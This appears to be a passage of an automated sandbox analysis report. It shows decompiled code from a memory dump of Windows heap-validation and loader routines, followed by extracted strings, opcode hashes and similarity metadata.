                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t189;
                                                				intOrPtr _t191;
                                                				intOrPtr _t210;
                                                				signed int _t225;
                                                				signed char _t231;
                                                				intOrPtr _t232;
                                                				unsigned int _t245;
                                                				intOrPtr _t249;
                                                				intOrPtr _t259;
                                                				signed int _t281;
                                                				signed int _t283;
                                                				intOrPtr _t284;
                                                				signed int _t288;
                                                				signed int* _t294;
                                                				signed int* _t298;
                                                				intOrPtr* _t299;
                                                				intOrPtr* _t300;
                                                				signed int _t307;
                                                				signed int _t309;
                                                				signed short _t312;
                                                				signed short _t315;
                                                				signed int _t317;
                                                				signed int _t320;
                                                				signed int _t322;
                                                				signed int _t326;
                                                				signed int _t327;
                                                				void* _t328;
                                                				signed int _t332;
                                                				signed int _t340;
                                                				signed int _t342;
                                                				signed char _t344;
                                                				signed int* _t345;
                                                				void* _t346;
                                                				signed char _t352;
                                                				signed char _t367;
                                                				signed int _t374;
                                                				intOrPtr* _t378;
                                                				signed int _t380;
                                                				signed int _t385;
                                                				signed char _t390;
                                                				unsigned int _t392;
                                                				signed char _t395;
                                                				unsigned int _t397;
                                                				intOrPtr* _t400;
                                                				signed int _t402;
                                                				signed int _t405;
                                                				intOrPtr* _t406;
                                                				signed int _t407;
                                                				intOrPtr _t412;
                                                				void* _t414;
                                                				signed int _t415;
                                                				signed int _t416;
                                                				signed int _t429;
                                                
                                                				_v16 = _v16 & 0x00000000;
                                                				_t189 = 0;
                                                				_v8 = _v8 & 0;
                                                				_t332 = __edx;
                                                				_v12 = 0;
                                                				_t414 = __ecx;
                                                				_t415 = __edx;
                                                				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                					L88:
                                                					_t416 = _v16;
                                                					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                							L107:
                                                							return 1;
                                                						}
                                                						_t191 =  *[fs:0x30];
                                                						__eflags =  *(_t191 + 0xc);
                                                						if( *(_t191 + 0xc) == 0) {
                                                							_push("HEAP: ");
                                                							E012DB150();
                                                						} else {
                                                							E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                						}
                                                						_push(_v12);
                                                						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                						_push(_t332);
                                                						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                						L122:
                                                						E012DB150();
                                                						L119:
                                                						return 0;
                                                					}
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push("HEAP: ");
                                                						E012DB150();
                                                					} else {
                                                						E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					_push(_t416);
                                                					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                					_push(_t332);
                                                					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                					goto L122;
                                                				} else {
                                                					goto L1;
                                                				}
                                                				do {
                                                					L1:
                                                					 *_a16 = _t415;
                                                					if( *(_t414 + 0x4c) != 0) {
                                                						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                						 *_t415 = _t392;
                                                						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                						_t424 = _t392 >> 0x18 - _t352;
                                                						if(_t392 >> 0x18 != _t352) {
                                                							_push(_t352);
                                                							E0138FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                						}
                                                					}
                                                					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                						_t210 =  *[fs:0x30];
                                                						__eflags =  *(_t210 + 0xc);
                                                						if( *(_t210 + 0xc) == 0) {
                                                							_push("HEAP: ");
                                                							E012DB150();
                                                						} else {
                                                							E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                						}
                                                						_push(_v8 & 0x0000ffff);
                                                						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                						__eflags = _t340;
                                                						_push(_t340);
                                                						E012DB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                						L117:
                                                						__eflags =  *(_t414 + 0x4c);
                                                						if( *(_t414 + 0x4c) != 0) {
                                                							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                							__eflags =  *_t415;
                                                						}
                                                						goto L119;
                                                					}
                                                					_t225 =  *_t415 & 0x0000ffff;
                                                					_t390 =  *(_t415 + 2);
                                                					_t342 = _t225;
                                                					_v8 = _t342;
                                                					_v20 = _t342;
                                                					_v28 = _t225 << 3;
                                                					if((_t390 & 0x00000001) == 0) {
                                                						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                						__eflags = _t344 & 0x00000001;
                                                						if((_t344 & 0x00000001) == 0) {
                                                							L66:
                                                							_t345 = _a12;
                                                							 *_a8 =  *_a8 + 1;
                                                							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                							__eflags =  *_t345;
                                                							L67:
                                                							_t231 =  *(_t415 + 6);
                                                							if(_t231 == 0) {
                                                								_t346 = _t414;
                                                							} else {
                                                								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                							}
                                                							if(_t346 != _t332) {
                                                								_t232 =  *[fs:0x30];
                                                								__eflags =  *(_t232 + 0xc);
                                                								if( *(_t232 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E012DB150();
                                                								} else {
                                                									E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_push( *(_t415 + 6) & 0x000000ff);
                                                								_push(_t415);
                                                								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                								goto L95;
                                                							} else {
                                                								if( *((char*)(_t415 + 7)) != 3) {
                                                									__eflags =  *(_t414 + 0x4c);
                                                									if( *(_t414 + 0x4c) != 0) {
                                                										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                										__eflags =  *_t415;
                                                									}
                                                									_t415 = _t415 + _v28;
                                                									__eflags = _t415;
                                                									goto L86;
                                                								}
                                                								_t245 =  *(_t415 + 0x1c);
                                                								if(_t245 == 0) {
                                                									_t395 =  *_t415 & 0x0000ffff;
                                                									_v6 = _t395 >> 8;
                                                									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                										__eflags =  *(_t414 + 0x4c);
                                                										if( *(_t414 + 0x4c) != 0) {
                                                											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                											__eflags =  *_t415;
                                                										}
                                                										goto L107;
                                                									}
                                                									_t249 =  *[fs:0x30];
                                                									__eflags =  *(_t249 + 0xc);
                                                									if( *(_t249 + 0xc) == 0) {
                                                										_push("HEAP: ");
                                                										E012DB150();
                                                									} else {
                                                										E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                									}
                                                									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                									_push(_t415);
                                                									_push("Heap block at %p is not last block in segment (%p)\n");
                                                									L95:
                                                									E012DB150();
                                                									goto L117;
                                                								}
                                                								_v12 = _v12 + 1;
                                                								_v16 = _v16 + (_t245 >> 0xc);
                                                								if( *(_t414 + 0x4c) != 0) {
                                                									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                								}
                                                								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                									L82:
                                                									_v8 = _v8 & 0x00000000;
                                                									goto L86;
                                                								} else {
                                                									if( *(_t414 + 0x4c) != 0) {
                                                										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                										 *_t415 = _t397;
                                                										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                										_t442 = _t397 >> 0x18 - _t367;
                                                										if(_t397 >> 0x18 != _t367) {
                                                											_push(_t367);
                                                											E0138FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                										}
                                                									}
                                                									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                										_t259 =  *[fs:0x30];
                                                										__eflags =  *(_t259 + 0xc);
                                                										if( *(_t259 + 0xc) == 0) {
                                                											_push("HEAP: ");
                                                											E012DB150();
                                                										} else {
                                                											E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                										}
                                                										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                										_push(_t415);
                                                										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                										goto L95;
                                                									} else {
                                                										if( *(_t414 + 0x4c) != 0) {
                                                											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                										}
                                                										goto L82;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						_t281 = _v28 + 0xfffffff0;
                                                						_v24 = _t281;
                                                						__eflags = _t390 & 0x00000002;
                                                						if((_t390 & 0x00000002) != 0) {
                                                							__eflags = _t281 - 4;
                                                							if(_t281 > 4) {
                                                								_t281 = _t281 - 4;
                                                								__eflags = _t281;
                                                								_v24 = _t281;
                                                							}
                                                						}
                                                						__eflags = _t390 & 0x00000008;
                                                						if((_t390 & 0x00000008) == 0) {
                                                							_t102 = _t415 + 0x10; // -8
                                                							_t283 = E0132D540(_t102, _t281, 0xfeeefeee);
                                                							_v20 = _t283;
                                                							__eflags = _t283 - _v24;
                                                							if(_t283 != _v24) {
                                                								_t284 =  *[fs:0x30];
                                                								__eflags =  *(_t284 + 0xc);
                                                								if( *(_t284 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E012DB150();
                                                								} else {
                                                									E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_t288 = _v20 + 8 + _t415;
                                                								__eflags = _t288;
                                                								_push(_t288);
                                                								_push(_t415);
                                                								_push("Free Heap block %p modified at %p after it was freed\n");
                                                								goto L95;
                                                							}
                                                							goto L66;
                                                						} else {
                                                							_t374 =  *(_t415 + 8);
                                                							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                							_v24 = _t374;
                                                							_v28 = _t400;
                                                							_t294 =  *(_t374 + 4);
                                                							__eflags =  *_t400 - _t294;
                                                							if( *_t400 != _t294) {
                                                								L64:
                                                								_push(_t374);
                                                								_push( *_t400);
                                                								_t101 = _t415 + 8; // -16
                                                								E0139A80D(_t414, 0xd, _t101, _t294);
                                                								goto L86;
                                                							}
                                                							_t56 = _t415 + 8; // -16
                                                							__eflags =  *_t400 - _t56;
                                                							_t374 = _v24;
                                                							if( *_t400 != _t56) {
                                                								goto L64;
                                                							}
                                                							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                							_t402 =  *(_t414 + 0xb4);
                                                							__eflags = _t402;
                                                							if(_t402 == 0) {
                                                								L35:
                                                								_t298 = _v28;
                                                								 *_t298 = _t374;
                                                								 *(_t374 + 4) = _t298;
                                                								__eflags =  *(_t415 + 2) & 0x00000008;
                                                								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                									L39:
                                                									_t377 =  *_t415 & 0x0000ffff;
                                                									_t299 = _t414 + 0xc0;
                                                									_v28 =  *_t415 & 0x0000ffff;
                                                									 *(_t415 + 2) = 0;
                                                									 *((char*)(_t415 + 7)) = 0;
                                                									__eflags =  *(_t414 + 0xb4);
                                                									if( *(_t414 + 0xb4) == 0) {
                                                										_t378 =  *_t299;
                                                									} else {
                                                										_t378 = E012FE12C(_t414, _t377);
                                                										_t299 = _t414 + 0xc0;
                                                									}
                                                									__eflags = _t299 - _t378;
                                                									if(_t299 == _t378) {
                                                										L51:
                                                										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                										__eflags =  *_t300 - _t378;
                                                										if( *_t300 != _t378) {
                                                											_push(_t378);
                                                											_push( *_t300);
                                                											__eflags = 0;
                                                											E0139A80D(0, 0xd, _t378, 0);
                                                										} else {
                                                											_t87 = _t415 + 8; // -16
                                                											_t406 = _t87;
                                                											 *_t406 = _t378;
                                                											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                											 *_t300 = _t406;
                                                											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                										}
                                                										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                										_t405 =  *(_t414 + 0xb4);
                                                										__eflags = _t405;
                                                										if(_t405 == 0) {
                                                											L61:
                                                											__eflags =  *(_t414 + 0x4c);
                                                											if(__eflags != 0) {
                                                												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                											}
                                                											goto L86;
                                                										} else {
                                                											_t380 =  *_t415 & 0x0000ffff;
                                                											while(1) {
                                                												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                													break;
                                                												}
                                                												_t307 =  *_t405;
                                                												__eflags = _t307;
                                                												if(_t307 == 0) {
                                                													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                													L60:
                                                													_t94 = _t415 + 8; // -16
                                                													E012FE4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                													goto L61;
                                                												}
                                                												_t405 = _t307;
                                                											}
                                                											_t309 = _t380;
                                                											goto L60;
                                                										}
                                                									} else {
                                                										_t407 =  *(_t414 + 0x4c);
                                                										while(1) {
                                                											__eflags = _t407;
                                                											if(_t407 == 0) {
                                                												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                											} else {
                                                												_t315 =  *(_t378 - 8);
                                                												_t407 =  *(_t414 + 0x4c);
                                                												__eflags = _t315 & _t407;
                                                												if((_t315 & _t407) != 0) {
                                                													_t315 = _t315 ^  *(_t414 + 0x50);
                                                													__eflags = _t315;
                                                												}
                                                												_t312 = _t315 & 0x0000ffff;
                                                											}
                                                											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                												goto L51;
                                                											}
                                                											_t378 =  *_t378;
                                                											__eflags = _t414 + 0xc0 - _t378;
                                                											if(_t414 + 0xc0 != _t378) {
                                                												continue;
                                                											}
                                                											goto L51;
                                                										}
                                                										goto L51;
                                                									}
                                                								}
                                                								_t317 = E012FA229(_t414, _t415);
                                                								__eflags = _t317;
                                                								if(_t317 != 0) {
                                                									goto L39;
                                                								}
                                                								E012FA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                								goto L86;
                                                							}
                                                							_t385 =  *_t415 & 0x0000ffff;
                                                							while(1) {
                                                								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                									break;
                                                								}
                                                								_t320 =  *_t402;
                                                								__eflags = _t320;
                                                								if(_t320 == 0) {
                                                									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                									L34:
                                                									_t63 = _t415 + 8; // -16
                                                									E012FBC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                									_t374 = _v24;
                                                									goto L35;
                                                								}
                                                								_t402 = _t320;
                                                							}
                                                							_t322 = _t385;
                                                							goto L34;
                                                						}
                                                					}
                                                					if(_a20 == 0) {
                                                						L18:
                                                						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                							goto L67;
                                                						}
                                                						if(E013823E3(_t414, _t415) == 0) {
                                                							goto L117;
                                                						}
                                                						goto L67;
                                                					} else {
                                                						if((_t390 & 0x00000002) == 0) {
                                                							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                						} else {
                                                							_t328 = E012D1F5B(_t415);
                                                							_t342 = _v20;
                                                							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                						}
                                                						_t429 = _t326;
                                                						if(_t429 == 0) {
                                                							goto L18;
                                                						}
                                                						if(_t429 >= 0) {
                                                							__eflags = _t326 & 0x00000800;
                                                							if(__eflags != 0) {
                                                								goto L18;
                                                							}
                                                							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                							if(__eflags >= 0) {
                                                								goto L18;
                                                							}
                                                							_t412 = _a20;
                                                							_t327 = _t326 & 0x0000ffff;
                                                							L17:
                                                							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                							goto L18;
                                                						}
                                                						_t327 = _t326 & 0x00007fff;
                                                						if(_t327 >= 0x81) {
                                                							goto L18;
                                                						}
                                                						_t412 = _a24;
                                                						goto L17;
                                                					}
                                                					L86:
                                                				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                				_t189 = _v12;
                                                				goto L88;
                                                			}
                                                0x01394ce2
                                                0x01394ce2
                                                0x01394ce5
                                                0x01394ce5
                                                0x01394ce7
                                                0x01394cfb
                                                0x01394ce9
                                                0x01394ce9
                                                0x01394cec
                                                0x01394cef
                                                0x01394cf1
                                                0x01394cf3
                                                0x01394cf3
                                                0x01394cf3
                                                0x01394cf6
                                                0x01394cf6
                                                0x01394d02
                                                0x01394d05
                                                0x00000000
                                                0x00000000
                                                0x01394d07
                                                0x01394d0f
                                                0x01394d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01394d11
                                                0x00000000
                                                0x01394ce5
                                                0x01394ce0
                                                0x01394c8a
                                                0x01394c8f
                                                0x01394c91
                                                0x00000000
                                                0x00000000
                                                0x01394c9d
                                                0x00000000
                                                0x01394c9d
                                                0x01394c52
                                                0x01394c5f
                                                0x01394c5f
                                                0x01394c62
                                                0x00000000
                                                0x00000000
                                                0x01394c57
                                                0x01394c59
                                                0x01394c5b
                                                0x01394caa
                                                0x01394c66
                                                0x01394c68
                                                0x01394c70
                                                0x01394c75
                                                0x00000000
                                                0x01394c75
                                                0x01394c5d
                                                0x01394c5d
                                                0x01394c64
                                                0x00000000
                                                0x01394c64
                                                0x01394c17
                                                0x01394b75
                                                0x01394bc4
                                                0x01394bc8
                                                0x00000000
                                                0x00000000
                                                0x01394bd9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01394b77
                                                0x01394b7a
                                                0x01394b8c
                                                0x01394b7c
                                                0x01394b7e
                                                0x01394b83
                                                0x01394b86
                                                0x01394b86
                                                0x01394b90
                                                0x01394b93
                                                0x00000000
                                                0x00000000
                                                0x01394b95
                                                0x01394bab
                                                0x01394bb0
                                                0x00000000
                                                0x00000000
                                                0x01394bb2
                                                0x01394bb9
                                                0x00000000
                                                0x00000000
                                                0x01394bbb
                                                0x01394bbe
                                                0x01394bc1
                                                0x01394bc1
                                                0x00000000
                                                0x01394bc1
                                                0x01394b97
                                                0x01394ba4
                                                0x00000000
                                                0x00000000
                                                0x01394ba6
                                                0x00000000
                                                0x01394ba6
                                                0x01394ea9
                                                0x01394ea9
                                                0x01394eb2
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 5bec4fe79b5109c410b0e5e92cc70b8a1ba89b25e832f38377dc5944e65a4ed7
                                                • Instruction ID: 3d109f1b85d3a6489bab8007655e18cb5c797d959bda5990633bb4b4738f2100
                                                • Opcode Fuzzy Hash: 5bec4fe79b5109c410b0e5e92cc70b8a1ba89b25e832f38377dc5944e65a4ed7
                                                • Instruction Fuzzy Hash: 4A12DE306106469FEF25CF29C594BBABBF5FF08708F14845DE58A8B642D734E882CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$MUI$R$T${
                                                • API String ID: 0-2515562510
                                                • Opcode ID: 004139a7a1680403b9a21d050239407ff36ad818ae6617d246768bf2ae4d5b3d
                                                • Instruction ID: af88c69876fbde400188f095e9ff400c2cb44747ac69c517d5e727afed24a2fb
                                                • Opcode Fuzzy Hash: 004139a7a1680403b9a21d050239407ff36ad818ae6617d246768bf2ae4d5b3d
                                                • Instruction Fuzzy Hash: E6924C70E04219CFDF66CF98C890BADBBF5BF45308F148299D999AB291D734A941CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: c8ae87c90573a497f8a781e63efa31747a3909b45f8d2bed60f366ba496c72c7
                                                • Instruction ID: 1e2b61ec175a55a333e48e5cb7ca49c819b65f86be49c1dc6a9ad5bb78f6474b
                                                • Opcode Fuzzy Hash: c8ae87c90573a497f8a781e63efa31747a3909b45f8d2bed60f366ba496c72c7
                                                • Instruction Fuzzy Hash: CC42DE316287429FD715CF28C884A2AFBE5FF98708F04496DF68A8B352D774E981CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 012E3F70
                                                • Kernel-MUI-Language-Disallowed, xrefs: 012E3E97
                                                • Kernel-MUI-Number-Allowed, xrefs: 012E3D8C
                                                • Kernel-MUI-Language-Allowed, xrefs: 012E3DC0
                                                • WindowsExcludedProcs, xrefs: 012E3D6F
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: b8e71f234ae7a0df13611dee3cfecfe3bbfb0dcc12715f6bdddf728dbd288ce3
                                                • Instruction ID: 9573676fe1a577087dc1c6d54895ff182eb98f12d7bd0159c30ade4ecc1203c9
                                                • Opcode Fuzzy Hash: b8e71f234ae7a0df13611dee3cfecfe3bbfb0dcc12715f6bdddf728dbd288ce3
                                                • Instruction Fuzzy Hash: E5F15D72D20259EFCB15EF98C984AEEBBF9FF48650F14016AE605E7211D7749E01CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                • API String ID: 0-188067316
                                                • Opcode ID: 4f1522c3f9a7ffa038058ee513712be8e7276e66ecd2a8876fee646a026e1681
                                                • Instruction ID: 8b2b947105aeaff87bc7630d8fe3f8d38e316f720eab31f015f97872bb37b0cd
                                                • Opcode Fuzzy Hash: 4f1522c3f9a7ffa038058ee513712be8e7276e66ecd2a8876fee646a026e1681
                                                • Instruction Fuzzy Hash: C501FC331342429ED22D9779E45EFA277F8DB41F74F19806DF00567781DAA4D480CA15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: #$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                • API String ID: 0-3266796247
                                                • Opcode ID: 9f960669baf830e3085db00f414158ed0531531efe20f6743dbedcd9bd970427
                                                • Instruction ID: f84ec009344e53d739b7b71861fd8b045ac6109b31c2236d778080dd9ca98cbb
                                                • Opcode Fuzzy Hash: 9f960669baf830e3085db00f414158ed0531531efe20f6743dbedcd9bd970427
                                                • Instruction Fuzzy Hash: B232B3319042698BDF27CF58C864BEDBBF9AF45348F1440E9E989A7291D730AE81CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • HEAP[%wZ]: , xrefs: 013422D7, 013423E7
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013422F3
                                                • HEAP: , xrefs: 013422E6, 013423F6
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01342403
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                • API String ID: 0-1657114761
                                                • Opcode ID: 53d58bb1692251fc685b5fe2e7c878783a2a858110d3aa66f32d29e40f42ea10
                                                • Instruction ID: 4d233a0a177e657aa0ab91f7de258e292fd520d2fee5f1127483048ecfc31e8d
                                                • Opcode Fuzzy Hash: 53d58bb1692251fc685b5fe2e7c878783a2a858110d3aa66f32d29e40f42ea10
                                                • Instruction Fuzzy Hash: 57D1AC34A206468FDB19CF68C490BBAFBF1BF48304F15857DEA5A9B345E370A945CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 0134344A
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 0134348D
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 013434D0
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01343513
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 7fa6980fc39845975e8370564ac50862b5b79f70e2802642cc287efeb35d035a
                                                • Instruction ID: 78314748d68b5317f13551363085b05570dfed97057b98516f7df42dc9b96ed2
                                                • Opcode Fuzzy Hash: 7fa6980fc39845975e8370564ac50862b5b79f70e2802642cc287efeb35d035a
                                                • Instruction Fuzzy Hash: E371E0B59043099FC721DF98C885B9BBBA8EF547A8F40446CFA498B247D734D588CBD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 2994545307-2586055223
                                                • Opcode ID: e05b623e36196744298fd81a8e1e945881b2685f1ab10bb3206e8fc3b63d2d52
                                                • Instruction ID: 668bcab54677eaf31209e25334624d326b786206411cc65bd3764c919d838719
                                                • Opcode Fuzzy Hash: e05b623e36196744298fd81a8e1e945881b2685f1ab10bb3206e8fc3b63d2d52
